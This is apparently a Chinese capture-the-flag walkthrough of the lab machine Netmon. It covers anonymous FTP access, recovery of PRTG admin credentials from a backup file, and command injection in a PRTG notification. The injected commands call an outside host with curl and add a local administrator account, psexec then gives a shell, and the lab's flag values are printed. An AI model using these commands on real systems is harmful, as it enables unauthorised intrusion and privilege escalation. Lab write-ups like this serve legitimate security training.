[Meachines] [Easy] Netmon FTP匿名登录+PRTG 网络监控RCE权限提升
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
信息收集
IP Address | Opening Ports |
---|---|
10.10.10.152 | TCP:21,135,139,139,445,5985 |
$ nmap -p- 10.10.10.152 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_03-04-19 02:12PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
FTP
ftp 10.10.10.152
ftp> get Users/Public/user.txt
User.txt
aef9a99e68e9807ecc4ecf46fc49746b
权限提升
PRTG 网络监控 RCE
http://10.10.10.152/index.htm
ftp> cd "ProgramData/Paessler/PRTG Network Monitor"
ftp> get "PRTG Configuration.old.bak"
$ cat PRTG\ Configuration.old.bak
username: prtgadmin
password: PrTg@dmin2018
根据日期推断密码也有可能是password: PrTg@dmin2019
Setup > Account Settings > Notifications
添加新通知
;curl http://10.10.16.17/rce
http://10.10.10.152/myaccount.htm?tabid=2
;curl http://10.10.16.17/Run;net user maptnh P0wned /add;curl http://10.10.16.17/UserAdd;net localgroup administrators maptnh /add;curl http://10.10.16.17/Done
$ impacket-psexec 'maptnh:P0wned@10.10.10.152'
Root.txt
fbaa6dc557503e828c1675b86665888f
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录